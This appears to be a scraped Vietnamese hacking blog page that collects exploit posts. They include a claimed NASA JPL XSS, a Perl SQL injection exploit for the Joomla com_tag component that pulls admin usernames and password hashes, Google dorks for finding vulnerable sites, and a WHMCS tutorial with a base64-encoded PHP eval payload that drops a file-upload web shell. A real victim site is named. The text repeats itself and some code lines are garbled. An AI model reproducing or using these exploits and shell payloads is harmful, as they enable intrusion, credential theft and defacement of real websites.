XSS Link:
http://onearth.jpl.nasa.gov/landsat.cgi?action=........38&zoom=0.100008
Soft mien phi ,hoc tap ,hack website,hack game,tai lieu aptech,du an,project thong tin dai hoc ,ung dung androind
Saturday, October 27, 2012
NASA Jet Propulsion Laboratory Vulnerable to Cross Site Scripting (XSS)
Another XSS vuln on NASA : I just want to proof that NASA is and never will be secured as human kind thinks they are.
XSS Link:
XSS Link:
Joomla Tags (index.php, tag parameter) SQL Injection
Exploit Title: Joomla tag Remote Sql Exploit
dork: inurl:index.php?option=com_tag
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://www.joomlatags.org
Version: all
License: Non-Commercial
Download: http://www.joomlatag...g-download.html
Descripcion:
N/A
Exploit:
dork: inurl:index.php?option=com_tag
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://www.joomlatags.org
Version: all
License: Non-Commercial
Download: http://www.joomlatag...g-download.html
Descripcion:
N/A
Exploit:
#!/usr/bin/perl -w
# Joomla Component (tag) Remote SQL Exploit
#----------------------------------------------------------------------------#
########################################
print "\t\t\n\n";
print "\t\n";
print "\t Daniel Barragan D4NB4R \n";
print "\t \n";
print "\t Joomla com_tag Remote Sql Exploit \n";
print "\t\n\n";
use LWP::UserAgent;
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";
chomp(my $target=);
#the username of joomla
$user="username";
#the pasword of joomla
$pass="password";
#the tables of joomla
$table="jos_users";
$d4n="com_tag&task";
$component="tag&lang=es";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /(.*?) /){
print "\nLos Datos Extraidos son:\n";
print "\n
* Admin User : $1";
}
if ($answer =~/(.*?) /){print "\n
* Admin Hash : $1\n\n";
print "\t\t# El Exploit aporto usuario y password #\n\n";}
else{print "\n[-] Exploit Failed, Intente manualmente...\n";}
[Tutorial] WHMCS Submitticket Exploit
Video Tutorial:
Victim: http://www.webwizard-lk.com/
Shell Code:
http://www.mediafire.com/?p9c5kxyodd6lp6aPass Unlock:
junookyoExploit này cũng có lâu rồi, làm TUT này cho newbie thôi nhé. Pro nào biết rồi miễn quăng gạch :).
Dork: inurl:"submitticket.php?step=2"Dork: inurl:"submitticket.php?step=2"
Victim: http://www.webwizard-lk.com/
Victim: http://www.webwizard-lk.com/
Shell Code:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdjM1ZqWTJWemMyWjFiQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ2dsbGJITmxJSHNnWldOb2J5QW5QR0krVlhCc2IyRmtJR1poYVd4bFpDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DbjBOQ2o4KyIpOw0KJGZvID0gZm9wZW4oImoydC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs='));{/php}
[Tutorial] WHMCS Submitticket Exploit
Video Tutorial:
Victim: http://www.webwizard-lk.com/
Shell Code:
http://www.mediafire.com/?p9c5kxyodd6lp6aPass Unlock:
junookyoExploit này cũng có lâu rồi, làm TUT này cho newbie thôi nhé. Pro nào biết rồi miễn quăng gạch :).
Dork: inurl:"submitticket.php?step=2"Dork: inurl:"submitticket.php?step=2"
Victim: http://www.webwizard-lk.com/
Victim: http://www.webwizard-lk.com/
Shell Code:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdjM1ZqWTJWemMyWjFiQ0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ2dsbGJITmxJSHNnWldOb2J5QW5QR0krVlhCc2IyRmtJR1poYVd4bFpDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DbjBOQ2o4KyIpOw0KJGZvID0gZm9wZW4oImoydC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs='));{/php}
[TUT] SQLi - Login AdminCP - Deface with XSS
* Tutorial khai thác "ChangUonDyU - Advanced Statistics SQL injection", truy vấn lấy hash để bypass AdminCP, Deface sử dụng XSS.
* Download: http://www.mediafire.com/?1jk4j6wan1v7lie
* Password: (Only Juno_okyo's Blog Members).
* Download: http://www.mediafire.com/?1jk4j6wan1v7lie
* Password: (Only Juno_okyo's Blog Members).